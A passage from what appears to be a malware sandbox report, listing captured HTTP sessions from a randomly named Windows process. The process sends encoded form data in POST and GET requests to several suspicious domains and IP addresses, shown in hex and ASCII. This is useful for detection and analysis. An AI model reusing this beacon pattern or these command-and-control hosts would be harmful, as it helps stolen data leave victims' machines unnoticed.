9TND4h=ljhj3Grls4QkmHBqcw4ZR5IjjiDQv2aeE+zOzGRwW+arzaCGMXoZX7AMBzgiM+hzlTm5/k6hRsdhp8QYZT6FHIPh3XWRppwggyqgEVlr/sDRyYk+lxyJ855vhbIyfz9B9KnF3NjhJRjOrQb+e399FDaphBw4sLJmqBid9ZATbZlxqoiA9jTxEmmhqDx/U+nHyHbRb9nvdA88GT1LRAyKSBSTkFFJeDBh1GR3WfpxHMJFcnlGNiW/wWjgliyuIoVWYXj7igggPGW4dgzjbPiTtuwpuEtLkaKTfM2VYjVIjT2Po7lCzhTuekeTo0h8eDen+l3Rf9YiLU5jyVctfKTjF4wEdHLZCMOhxjYuVYJW98UwNmSPnfZ5ua32vbKM7WtVvUCeaNnGegnmsacx+IJdVsC1KXdHJmeAy5L/JSa9R1sSOnQNmbS1brz0ae4TSu7eqA1elR/hriU0tTs7vldeCXQftvN0/MoSag4YbMyNDHns+ZJa6vtCi5OKMAZkTFQLhr3yqzwVPPvoSSXay8f3M211py7Fks8/UN6khsd7LXYPXWf8+qbQgOrHs6P7ZUy4GYOP3UV0hqrVqyRvRGCtzwOKxoSEEF0TpFYXhE5s34HK8FKLcu6FBNvYB5KaM9Jk3tZF2JcfO1aneL+lSY1kC9QTy8hOnlt2FHSg00HTKUdkOcQjgyBiw39yp07QwzQXV0RKrRykydTUNmXWxRuk72J5U7xp5vPk7TMy4lt3oTx2644rTrCoG4vr+o5Z/9PR7LypGv86y0jIg1YMfiQeih8Aj2F7SW330Yi59zYMWKaTu1ZDM0nZWDdDO4QVC5hNXH/Cae7itBps8SfZwLRIZGVgqiUm5X8jyVnw+MKwh4ySSc0auCkml1wdgKNaNtG14OzF9NTcbemwfYRU1TyJoXBMQ5BwfH45GgBGpY0XKQcsTLbuKMVBlmA6wF42hygzNmBlNT8hD1DhBrDvaFkYZFTSKF6T5sx/prIMPfeKGxEMY [TRUNCATED]
Jul 5, 2024 03:24:21.744502068 CEST	533	IN	HTTP/1.1 404 Not Found Date: Fri, 05 Jul 2024 01:24:21 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	52666	203.161.55.102	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:24:23.613780975 CEST	490	OUT	GET /ff8d/?MXOD=nDFLlbM87h&9TND4h=ohJD03igrpR8lwlwc1M4EqZrzingiHicFb+y4T5GGfrPyp+0FgUaOIwicDYxE9IqyQjr9lfiRuNbkNF7eyT6Zergy2OfkJkLywWhdn0W3d/t29Aith2p64g= HTTP/1.1 Host: www.lexiecos.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 5, 2024 03:24:24.216188908 CEST	548	IN	HTTP/1.1 404 Not Found Date: Fri, 05 Jul 2024 01:24:24 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	52667	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:24:29.616614103 CEST	751	OUT	POST /l8a4/ HTTP/1.1 Host: www.augaqfp.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.augaqfp.lol Referer: http://www.augaqfp.lol/l8a4/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 50 4e 6a 62 62 37 48 35 61 57 6a 4c 6b 43 64 41 44 4a 74 59 7a 4a 6b 4c 4b 32 6e 5a 38 62 57 70 4e 78 46 76 52 56 49 4d 73 33 34 36 32 76 77 73 35 65 53 76 31 63 31 62 78 6c 76 69 46 43 69 65 4d 42 77 4e 51 41 54 52 53 74 63 67 41 5a 4e 4a 47 71 65 2f 56 2b 79 4d 6b 42 34 50 6c 30 46 43 35 56 34 4c 35 4e 47 45 44 38 38 64 34 67 65 70 31 52 46 46 44 6a 53 7a 43 71 33 75 72 73 79 4e 31 65 64 59 64 64 2f 69 76 4a 4f 50 70 4d 36 46 61 71 66 7a 6c 4a 47 45 78 4d 51 55 33 5a 6f 52 66 63 73 6d 79 41 75 71 32 63 2b 50 61 43 77 66 47 6a 72 43 2b 58 4e 33 57 36 65 6a 70 45 6e 53 71 77 3d 3d Data Ascii: 9TND4h=PNjbb7H5aWjLkCdADJtYzJkLK2nZ8bWpNxFvRVIMs3462vws5eSv1c1bxlviFCieMBwNQATRStcgAZNJGqe/V+yMkB4Pl0FC5V4L5NGED88d4gep1RFFDjSzCq3ursyN1edYdd/ivJOPpM6FaqfzlJGExMQU3ZoRfcsmyAuq2c+PaCwfGjrC+XN3W6ejpEnSqw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	52668	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:24:32.160099030 CEST	771	OUT	POST /l8a4/ HTTP/1.1 Host: www.augaqfp.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.augaqfp.lol Referer: http://www.augaqfp.lol/l8a4/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 50 4e 6a 62 62 37 48 35 61 57 6a 4c 6b 68 46 41 50 4b 31 59 6a 5a 6b 49 41 57 6e 5a 72 4c 57 74 4e 78 42 76 52 58 6b 63 74 42 41 36 33 4e 34 73 34 66 53 76 30 63 31 62 2b 46 76 6e 4b 69 69 46 4d 41 4d 2f 51 46 72 52 53 74 49 67 41 63 4a 4a 46 5a 6e 70 58 75 79 43 38 78 34 4e 34 45 46 43 35 56 34 4c 35 4e 6a 72 44 36 55 64 35 55 69 70 33 7a 68 61 41 6a 53 30 53 4b 33 75 76 73 79 4a 31 65 64 2b 64 59 58 45 76 4d 4b 50 70 4e 71 46 62 37 66 77 76 4a 47 43 38 73 51 4c 37 63 45 5a 64 4d 67 6f 7a 7a 75 6d 35 66 65 6b 66 45 68 46 58 53 4b 56 73 58 70 45 4c 39 58 58 6b 48 61 62 78 78 5a 34 56 57 6d 75 63 6c 48 48 65 38 55 4c 38 61 56 59 6d 70 51 3d Data Ascii: 9TND4h=PNjbb7H5aWjLkhFAPK1YjZkIAWnZrLWtNxBvRXkctBA63N4s4fSv0c1b+FvnKiiFMAM/QFrRStIgAcJJFZnpXuyC8x4N4EFC5V4L5NjrD6Ud5Uip3zhaAjS0SK3uvsyJ1ed+dYXEvMKPpNqFb7fwvJGC8sQL7cEZdMgozzum5fekfEhFXSKVsXpEL9XXkHabxxZ4VWmuclHHe8UL8aVYmpQ=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	52669	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:24:34.697621107 CEST	10853	OUT	POST /l8a4/ HTTP/1.1 Host: www.augaqfp.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.augaqfp.lol Referer: http://www.augaqfp.lol/l8a4/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 50 4e 6a 62 62 37 48 35 61 57 6a 4c 6b 68 46 41 50 4b 31 59 6a 5a 6b 49 41 57 6e 5a 72 4c 57 74 4e 78 42 76 52 58 6b 63 74 43 67 36 32 2b 67 73 34 38 36 76 7a 63 31 62 33 6c 76 6d 4b 69 69 45 4d 42 6b 42 51 45 58 42 53 75 77 67 47 2b 42 4a 52 34 6e 70 65 75 79 43 67 42 34 4d 6c 30 46 62 35 56 6f 50 35 4e 54 72 44 36 55 64 35 56 79 70 2b 42 46 61 4d 44 53 7a 43 71 33 71 72 73 79 74 31 65 31 41 64 59 54 79 73 34 2b 50 77 74 61 46 59 49 33 77 6e 4a 47 41 37 73 52 65 37 63 42 48 64 4d 74 58 7a 77 7a 4a 35 59 75 6b 54 42 63 48 45 47 4f 55 35 32 39 68 52 64 79 79 6f 47 4f 32 37 47 52 39 52 6b 43 6c 65 57 36 71 51 50 35 44 70 5a 35 76 36 39 78 4b 45 49 75 71 6f 48 73 79 64 4b 6c 6f 45 53 51 4b 35 37 7a 74 57 49 51 43 76 54 51 77 4c 56 45 4b 2b 49 77 43 43 75 55 6d 38 6e 55 76 74 72 47 45 4d 55 41 74 41 6b 57 6e 45 57 43 74 71 32 44 38 73 65 50 53 4d 7a 37 4d 54 76 76 35 79 32 4b 4a 6d 75 30 4d 7a 67 53 4a 6f 30 41 5a 4c 7a 49 4d 4e 38 46 6d 38 65 67 71 43 67 39 72 34 4d 79 4a 4c 74 59 [TRUNCATED] Data Ascii: 9TND4h=PNjbb7H5aWjLkhFAPK1YjZkIAWnZrLWtNxBvRXkctCg62+gs486vzc1b3lvmKiiEMBkBQEXBSuwgG+BJR4npeuyCgB4Ml0Fb5VoP5NTrD6Ud5Vyp+BFaMDSzCq3qrsyt1e1AdYTys4+PwtaFYI3wnJGA7sRe7cBHdMtXzwzJ5YukTBcHEGOU529hRdyyoGO27GR9RkCleW6qQP5DpZ5v69xKEIuqoHsydKloESQK57ztWIQCvTQwLVEK+IwCCuUm8nUvtrGEMUAtAkWnEWCtq2D8sePSMz7MTvv5y2KJmu0MzgSJo0AZLzIMN8Fm8egqCg9r4MyJLtY7g4rY2e9AthZa1hjVn+Vu1UFdz9TbrIo4OD9ipRb6gsC3cfXslA/EX060hxIvVJsJZ3K9+rR/A9spN5m4Emhvl+w+FhMekbtas2taVeqUNrp6Hz8YhW8RqGMlKOmcN4nUBKRaesebam2D9UrXJtWZ+tOJcMPH8DaZemT4d342mrVURNYsr/aWZO8owsVgkdkhQsjLsAlUK24eJhBqtybrCv2OURoNo+2bLr3HSctL3C9tctIP8T6LTMUJOkm2GGpyyzj4HQUJMGtP64WYnnS0lsZ641k6OEDG3mJCvvu2IUSk09tjwJP0FoVn9ajSMD/7qdRY/fGA//zpMVDGRp9rS4aDGa1vZzD1rN2mLot9s5pIstMrOZqznuvlkvpIyvjRtkfbDt/ypObadNSqANO9BoLdSho/pQKb6EFsEotK8RmdMQ7gXapQwNS/IlMAq94d5omHHP1FUeR1WeHUzJRBm6TV7ckO5NYUJcdKq7jXBdt+sZrElBLM84W/RU4JrDtwStTwaGNwPWYVXgNa6oxiM4VPjZvYTLWCG7LxuQIroD7cr4xB6RHHgd2SDfrra3xP0fdzyqsvrgQW5uJw4GqTVk9L50bPvxdzrJVKuIQ8YaBb0J12eDO8Bo7wP3oHWPhkcd7JDFjuV1POrd17hF64WkEK5HJumbnZg [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	52670	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:24:37.238794088 CEST	489	OUT	GET /l8a4/?9TND4h=CPL7YN3vcnDyuUFtA6pv3uMhLFbLrJb1JE9LZisFmiEQ0vYrwOGtj9QBvlTfLzXcbjIACE/TYt0vO88JJ7+OI7LCsTQn12dDmlA0tsWVEcE74AqN9n1fFjE=&MXOD=nDFLlbM87h HTTP/1.1 Host: www.augaqfp.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	52671	13.248.169.48	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:03.943846941 CEST	766	OUT	POST /cns4/ HTTP/1.1 Host: www.webuyfontana.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.webuyfontana.com Referer: http://www.webuyfontana.com/cns4/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 57 38 2f 64 45 62 75 59 48 33 38 35 6b 75 78 6b 49 55 4c 77 63 63 54 77 72 69 50 34 45 44 63 53 71 44 4f 43 61 6c 4d 62 43 79 4d 6a 35 42 45 54 73 65 4b 61 66 43 35 49 70 65 32 44 78 55 35 37 53 77 34 4b 48 53 63 4f 37 66 34 62 6b 38 76 6a 44 63 71 42 49 41 4c 48 43 4c 69 67 61 4a 39 54 55 6a 47 2f 2b 7a 31 49 4e 64 7a 64 4a 31 53 6d 6b 47 5a 79 42 46 47 50 57 37 62 55 2b 55 31 2f 78 4f 35 34 54 33 77 57 65 6e 38 6d 51 6f 6c 56 35 48 54 4b 47 42 62 4c 57 72 47 7a 50 38 41 6f 30 68 41 6c 4a 74 57 41 49 39 67 31 50 5a 76 70 41 54 62 52 71 30 73 79 66 46 36 6f 7a 59 58 39 61 67 3d 3d Data Ascii: 9TND4h=W8/dEbuYH385kuxkIULwccTwriP4EDcSqDOCalMbCyMj5BETseKafC5Ipe2DxU57Sw4KHScO7f4bk8vjDcqBIALHCLigaJ9TUjG/+z1INdzdJ1SmkGZyBFGPW7bU+U1/xO54T3wWen8mQolV5HTKGBbLWrGzP8Ao0hAlJtWAI9g1PZvpATbRq0syfF6ozYX9ag==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	52672	13.248.169.48	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:06.504221916 CEST	786	OUT	POST /cns4/ HTTP/1.1 Host: www.webuyfontana.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.webuyfontana.com Referer: http://www.webuyfontana.com/cns4/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 57 38 2f 64 45 62 75 59 48 33 38 35 6b 4e 5a 6b 45 58 6a 77 58 63 54 33 68 43 50 34 4f 6a 63 57 71 44 43 43 61 67 67 4c 43 41 6f 6a 36 67 30 54 76 62 32 61 59 43 35 49 78 75 32 4b 76 6b 35 47 53 77 6b 6f 48 57 63 4f 37 66 73 62 6b 35 72 6a 43 74 71 43 4a 51 4c 46 62 62 69 69 55 70 39 54 55 6a 47 2f 2b 7a 68 79 4e 5a 6e 64 4a 47 36 6d 6c 69 46 78 4c 6c 47 4d 47 4c 62 55 30 30 31 37 78 4f 35 57 54 30 30 77 65 68 77 6d 51 74 5a 56 34 56 37 4c 50 42 62 4a 5a 4c 48 67 4a 75 77 6c 31 7a 78 49 42 63 33 37 4f 65 4d 55 44 2f 2b 7a 52 69 36 47 34 30 49 42 43 43 7a 63 2b 62 71 30 42 75 43 47 2f 4e 39 47 62 42 63 5a 67 52 52 56 49 35 59 6f 31 77 34 3d Data Ascii: 9TND4h=W8/dEbuYH385kNZkEXjwXcT3hCP4OjcWqDCCaggLCAoj6g0Tvb2aYC5Ixu2Kvk5GSwkoHWcO7fsbk5rjCtqCJQLFbbiiUp9TUjG/+zhyNZndJG6mliFxLlGMGLbU0017xO5WT00wehwmQtZV4V7LPBbJZLHgJuwl1zxIBc37OeMUD/+zRi6G40IBCCzc+bq0BuCG/N9GbBcZgRRVI5Yo1w4=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	52673	13.248.169.48	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:09.042121887 CEST	10868	OUT	POST /cns4/ HTTP/1.1 Host: www.webuyfontana.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.webuyfontana.com Referer: http://www.webuyfontana.com/cns4/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 57 38 2f 64 45 62 75 59 48 33 38 35 6b 4e 5a 6b 45 58 6a 77 58 63 54 33 68 43 50 34 4f 6a 63 57 71 44 43 43 61 67 67 4c 43 41 67 6a 35 53 38 54 76 38 69 61 5a 43 35 49 38 4f 32 50 76 6b 35 68 53 77 73 73 48 57 5a 7a 37 64 55 62 6c 66 58 6a 58 70 2b 43 43 51 4c 46 47 4c 69 6e 61 4a 38 54 55 6a 32 6a 2b 7a 78 79 4e 5a 6e 64 4a 41 47 6d 73 57 5a 78 59 31 47 50 57 37 62 41 2b 55 30 63 78 4f 78 67 54 31 41 47 64 52 51 6d 52 4e 70 56 37 6d 54 4c 41 42 62 48 63 4c 47 6e 4a 75 39 6c 31 7a 39 71 42 63 43 7a 4f 64 51 55 41 70 66 6f 44 79 76 59 6c 31 67 44 5a 77 62 4a 6e 38 4b 7a 46 63 72 2f 33 39 56 54 48 53 63 6e 36 52 34 4f 51 4b 34 6a 6d 57 54 56 2b 4b 59 6f 64 57 6d 61 64 51 65 6d 6a 34 77 56 63 46 56 78 6e 68 2f 6e 6f 6e 4f 55 62 34 6e 55 66 56 30 41 5a 6d 76 79 57 66 38 58 35 67 54 69 4e 79 66 5a 52 44 54 53 2b 67 33 31 61 59 4a 78 6b 53 4c 45 30 38 78 4a 53 38 72 53 65 66 75 4b 75 4b 54 2f 59 4f 54 48 7a 74 32 44 4e 31 4f 70 31 41 4a 2b 59 4e 73 30 4c 4d 5a 4a 38 52 45 6a 71 4f 45 [TRUNCATED] Data Ascii: 9TND4h=W8/dEbuYH385kNZkEXjwXcT3hCP4OjcWqDCCaggLCAgj5S8Tv8iaZC5I8O2Pvk5hSwssHWZz7dUblfXjXp+CCQLFGLinaJ8TUj2j+zxyNZndJAGmsWZxY1GPW7bA+U0cxOxgT1AGdRQmRNpV7mTLABbHcLGnJu9l1z9qBcCzOdQUApfoDyvYl1gDZwbJn8KzFcr/39VTHScn6R4OQK4jmWTV+KYodWmadQemj4wVcFVxnh/nonOUb4nUfV0AZmvyWf8X5gTiNyfZRDTS+g31aYJxkSLE08xJS8rSefuKuKT/YOTHzt2DN1Op1AJ+YNs0LMZJ8REjqOEkkvQg2Hax0fSF+unUN3Jya3nu0lHpccAARnQ7MzjYhxQifzmOvR+Q73v0ne5ozHhWdtWzKSTZWBIuJ1c8v7ng2F5CjhoCI4wlXQSvJ+jmcc5Xh6OBm6BLUr5B7sfOFvy6OsmuIlAYyIL4UccekEHaSu+iwG0SqZD4+OUKCeGQ2fSPIp3iqCkJIgVaDvhjQcrZYs3xOwiHtYeZj95brUZ/jg+D9ktHjQRExFjqY1RFvegEm9ezZqrvVGSU/k0wDNErZzTo53K/UWRzXFCjMfXXq3VTI1+/xFZbcU+vRgsK2I8ty9eAR0thSyzxwCV4Jz0yXf08FDjf5nOb0rbdCJweoe9fRZC78L5Hpxiy6q518Fgvha4e/ZOHWqSMDHEWKnxfOOCpwBYG/44tVdwafk9I2KWzzHT+w318UQKwzTTOT7Gyph5VY5ySsLjIr4DpsDYx3R9n04ua4gFPOcH4kWbL9uNJyVk4etqK8WU7S7M0eMCCwydQM158WMS0YhVMNqwHXBSX4CXNxce67oH8Ff9n1ii5YQscfZ0R8hyoqk6F/7IU5rQUzwNqSoeeEodhXpNhua6Np5sfScBESiIf4guh8EtCcCjC0V0WtX9esIk7evgCleOIkn36CduAyhafoWc5klJdWQNPBkzpG1BUtCXOeyrAbvgNmE29C [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	52674	13.248.169.48	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:25:11.574084044 CEST	494	OUT	GET /cns4/?MXOD=nDFLlbM87h&9TND4h=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs= HTTP/1.1 Host: www.webuyfontana.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 5, 2024 03:25:12.051940918 CEST	398	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 05 Jul 2024 01:25:12 GMT Content-Type: text/html Content-Length: 258 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4d 58 4f 44 3d 6e 44 46 4c 6c 62 4d 38 37 68 26 39 54 4e 44 34 68 3d 62 2b 58 39 48 73 79 64 58 32 45 5a 68 6f 46 62 48 57 44 47 57 4c 6e 38 71 53 44 6a 4a 69 42 76 67 67 32 46 56 68 63 4c 41 42 6b 68 7a 7a 73 30 75 63 6d 42 50 44 4d 52 71 74 4b 65 33 58 55 4d 46 44 77 35 46 53 39 4a 69 39 49 6d 6b 63 62 34 4d 2b 53 67 56 31 43 72 4c 49 4b 57 54 38 52 2f 4c 43 32 65 2b 41 6c 4a 45 62 2f 68 48 77 4f 33 75 47 4e 53 4a 45 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?MXOD=nDFLlbM87h&9TND4h=b+X9HsydX2EZhoFbHWDGWLn8qSDjJiBvgg2FVhcLABkhzzs0ucmBPDMRqtKe3XUMFDw5FS9Ji9Imkcb4M+SgV1CrLIKWT8R/LC2e+AlJEb/hHwO3uGNSJEs="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	52675	38.47.232.224	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
